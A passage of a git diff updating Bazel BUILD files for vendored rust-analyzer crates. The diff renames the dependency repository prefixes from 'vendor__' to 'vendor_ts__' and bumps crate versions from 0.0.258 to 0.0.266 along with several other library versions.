"@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra_ap_hir_expand-0.0.266//:ra_ap_hir_expand", + "@vendor_ts__ra_ap_ide_db-0.0.266//:ra_ap_ide_db", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_proc_macro_api-0.0.266//:ra_ap_proc_macro_api", + "@vendor_ts__ra_ap_project_model-0.0.266//:ra_ap_project_model", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__ra_ap_vfs-notify-0.0.266//:ra_ap_vfs_notify", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel similarity index 74% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel index f2161a2ee382..c3a16c603ff2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_mbe-0.0.266.bazel @@ -17,13 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge": "syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge": "syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], 
@@ -88,20 +88,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__arrayvec-0.7.6//:arrayvec", - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_syntax-bridge-0.0.258//:ra_ap_syntax_bridge", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__arrayvec-0.7.6//:arrayvec", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_syntax-bridge-0.0.266//:ra_ap_syntax_bridge", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel index 7b9d090ca90b..e183b2734b9e 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.258.bazel 
+++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_parser-0.0.266.bazel @@ -17,8 +17,7 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_edition-0.0.258//:ra_ap_edition": "edition", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit": "limit", + "@vendor_ts__ra_ap_edition-0.0.266//:ra_ap_edition": "edition", }, compile_data = glob( include = ["**"], @@ -87,12 +86,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__drop_bomb-0.1.5//:drop_bomb", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_edition-0.0.258//:ra_ap_edition", - "@vendor__ra_ap_limit-0.0.258//:ra_ap_limit", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__drop_bomb-0.1.5//:drop_bomb", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_edition-0.0.266//:ra_ap_edition", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel index ad60384aca90..71c23f70a942 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_paths-0.0.266.bazel @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__camino-1.1.9//:camino", + "@vendor_ts__camino-1.1.9//:camino", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel similarity index 79% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel index 8d97fd5cdd80..52cd154b6fcc 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_proc_macro_api-0.0.266.bazel @@ -17,11 +17,11 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt": "tt", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt": "tt", }, compile_data = glob( include = ["**"], @@ -38,7 +38,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", 
@@ -89,17 +89,17 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_tt-0.0.258//:ra_ap_tt", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_tt-0.0.266//:ra_ap_tt", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel similarity index 80% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel index 755a0f6b3834..1ca7ddd38df7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_profile-0.0.266.bazel 
@@ -79,46 +79,46 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__libc-0.2.169//:libc", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], 
"@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") + "@vendor_ts__perf-event-0.4.7//:perf_event", # cfg(target_os = "linux") ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel similarity index 71% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel index 7ebaa0815432..7edf5bc0f821 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_project_model-0.0.266.bazel 
@@ -17,13 +17,13 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db": "base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg": "cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern": "intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths": "paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span": "span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_toolchain-0.0.258//:ra_ap_toolchain": "toolchain", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db": "base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg": "cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern": "intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths": "paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span": "span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_toolchain-0.0.266//:ra_ap_toolchain": "toolchain", }, compile_data = glob( include = ["**"], @@ -40,7 +40,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__serde_derive-1.0.217//:serde_derive", + "@vendor_ts__serde_derive-1.0.218//:serde_derive", ], rustc_flags = [ "--cap-lints=allow", 
@@ -91,24 +91,24 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__anyhow-1.0.95//:anyhow", - "@vendor__cargo_metadata-0.18.1//:cargo_metadata", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_base_db-0.0.258//:ra_ap_base_db", - "@vendor__ra_ap_cfg-0.0.258//:ra_ap_cfg", - "@vendor__ra_ap_intern-0.0.258//:ra_ap_intern", - "@vendor__ra_ap_paths-0.0.258//:ra_ap_paths", - "@vendor__ra_ap_span-0.0.258//:ra_ap_span", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_toolchain-0.0.258//:ra_ap_toolchain", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__semver-1.0.24//:semver", - "@vendor__serde-1.0.217//:serde", - "@vendor__serde_json-1.0.135//:serde_json", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__anyhow-1.0.96//:anyhow", + "@vendor_ts__cargo_metadata-0.18.1//:cargo_metadata", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_base_db-0.0.266//:ra_ap_base_db", + "@vendor_ts__ra_ap_cfg-0.0.266//:ra_ap_cfg", + "@vendor_ts__ra_ap_intern-0.0.266//:ra_ap_intern", + "@vendor_ts__ra_ap_paths-0.0.266//:ra_ap_paths", + "@vendor_ts__ra_ap_span-0.0.266//:ra_ap_span", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_toolchain-0.0.266//:ra_ap_toolchain", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__semver-1.0.24//:semver", + "@vendor_ts__serde-1.0.218//:serde", + "@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel similarity index 86% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel index a9542ad6008d..bab83cc8eebd 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-0.0.266.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__ra_ap_salsa-macros-0.0.258//:ra_salsa_macros", + "@vendor_ts__ra_ap_salsa-macros-0.0.266//:ra_salsa_macros", ], rustc_flags = [ "--cap-lints=allow", @@ -82,16 +82,16 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__oorandom-11.1.4//:oorandom", - "@vendor__parking_lot-0.12.3//:parking_lot", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smallvec-1.13.2//:smallvec", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__oorandom-11.1.4//:oorandom", + "@vendor_ts__parking_lot-0.12.3//:parking_lot", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smallvec-1.14.0//:smallvec", + "@vendor_ts__tracing-0.1.41//:tracing", + "@vendor_ts__triomphe-0.1.14//:triomphe", ], ) 
diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel index b753230db46a..53313071100f 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_salsa-macros-0.0.266.bazel @@ -79,11 +79,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__heck-0.4.1//:heck", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__heck-0.4.1//:heck", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel similarity index 85% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel index ee3121891d2d..b77f7a5723da 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_span-0.0.266.bazel 
@@ -17,9 +17,9 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax": "syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs": "vfs", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax": "syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs": "vfs", }, compile_data = glob( include = ["**"], @@ -88,15 +88,15 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__la-arena-0.3.1//:la_arena", - "@vendor__ra_ap_salsa-0.0.258//:ra_salsa", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__ra_ap_syntax-0.0.258//:ra_ap_syntax", - "@vendor__ra_ap_vfs-0.0.258//:ra_ap_vfs", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__text-size-1.1.1//:text_size", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__la-arena-0.3.1//:la_arena", + "@vendor_ts__ra_ap_salsa-0.0.266//:ra_salsa", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__ra_ap_syntax-0.0.266//:ra_ap_syntax", + "@vendor_ts__ra_ap_vfs-0.0.266//:ra_ap_vfs", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__text-size-1.1.1//:text_size", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel similarity index 84% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel index 6c81bb672056..dec7e842d90b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_stdx-0.0.266.bazel 
@@ -79,25 +79,25 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__always-assert-0.2.0//:always_assert", - "@vendor__crossbeam-channel-0.5.14//:crossbeam_channel", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__jod-thread-0.1.2//:jod_thread", - "@vendor__libc-0.2.169//:libc", + "@vendor_ts__always-assert-0.2.0//:always_assert", + "@vendor_ts__crossbeam-channel-0.5.14//:crossbeam_channel", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__jod-thread-0.1.2//:jod_thread", + "@vendor_ts__libc-0.2.169//:libc", ] + select({ "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__miow-0.6.0//:miow", # cfg(windows) - "@vendor__windows-sys-0.52.0//:windows_sys", # cfg(windows) + "@vendor_ts__miow-0.6.0//:miow", # cfg(windows) + "@vendor_ts__windows-sys-0.59.0//:windows_sys", # cfg(windows) ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel similarity index 82% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel index 02cf67802e69..de3c0271fd46 100644 
--- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.258.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ra_ap_syntax-0.0.266.bazel @@ -17,8 +17,8 @@ rust_library( allow_empty = True, ), aliases = { - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser": "parser", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx": "stdx", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser": "parser", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx": "stdx", }, compile_data = glob( include = ["**"], @@ -83,20 +83,20 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.0.258", + version = "0.0.266", deps = [ - "@vendor__cov-mark-2.0.0//:cov_mark", - "@vendor__either-1.13.0//:either", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__ra-ap-rustc_lexer-0.87.0//:ra_ap_rustc_lexer", - "@vendor__ra_ap_parser-0.0.258//:ra_ap_parser", - "@vendor__ra_ap_stdx-0.0.258//:ra_ap_stdx", - "@vendor__rowan-0.15.15//:rowan", - "@vendor__rustc-hash-2.1.0//:rustc_hash", - "@vendor__smol_str-0.3.2//:smol_str", - "@vendor__tracing-0.1.41//:tracing", - "@vendor__triomphe-0.1.14//:triomphe", + "@vendor_ts__cov-mark-2.0.0//:cov_mark", + "@vendor_ts__either-1.14.0//:either", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__ra-ap-rustc_lexer-0.97.0//:ra_ap_rustc_lexer", + "@vendor_ts__ra_ap_parser-0.0.266//:ra_ap_parser", + "@vendor_ts__ra_ap_stdx-0.0.266//:ra_ap_stdx", + "@vendor_ts__rowan-0.15.15//:rowan", + "@vendor_ts__rustc-hash-2.1.1//:rustc_hash", + "@vendor_ts__smol_str-0.3.2//:smol_str", + 